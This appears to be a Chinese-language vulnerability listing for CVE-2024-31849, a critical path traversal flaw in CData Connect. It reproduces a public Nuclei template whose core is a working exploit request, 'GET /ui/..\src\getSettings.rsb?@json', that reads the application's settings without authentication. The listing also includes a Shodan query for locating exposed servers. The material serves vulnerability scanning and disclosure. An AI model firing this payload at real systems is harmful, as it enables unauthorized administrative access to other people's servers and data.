CVE-2024-31849: CData Connect < 23.4.8846 - Path Traversal

日期: 2025-08-01 | 影响软件: CData Connect | POC: 已公开

漏洞描述

A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.

PoC代码[已公开]

id: CVE-2024-31849

info:
  name: CData Connect < 23.4.8846 - Path Traversal
  author: DhiyaneshDK
  severity: critical
  description: |
    A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
  reference:
    - https://www.tenable.com/security/research/tra-2024-09
    - https://www.cdata.com/kb/entries/jetty-cve-0324.rst
    - https://nvd.nist.gov/vuln/detail/CVE-2024-31849
    - https://github.com/Ostorlab/KEV
    - https://github.com/Stuub/CVE-2024-31848-PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-31849
    cwe-id: CWE-22
    epss-score: 0.90996
    epss-percentile: 0.99622
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:\"CData Connect\""
  tags: cve,cve2024,cdata,lfi
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.rst'

    matchers:
      - type: word
        internal: true
        words:
          - 'CData - Connect'

  - raw:
      - |
        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"items":[{'
          - ':"true"'
          - 'notifyemail'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a00297031caf3d0fe4f44e58321c2655e7d098864d9a6690f9857ce4463346260221009d1628e748c2b3872d8cffd3721af614105b15a7c38afa9019ecadfb141579fe:922c64590222798bb761d5b6d8e72950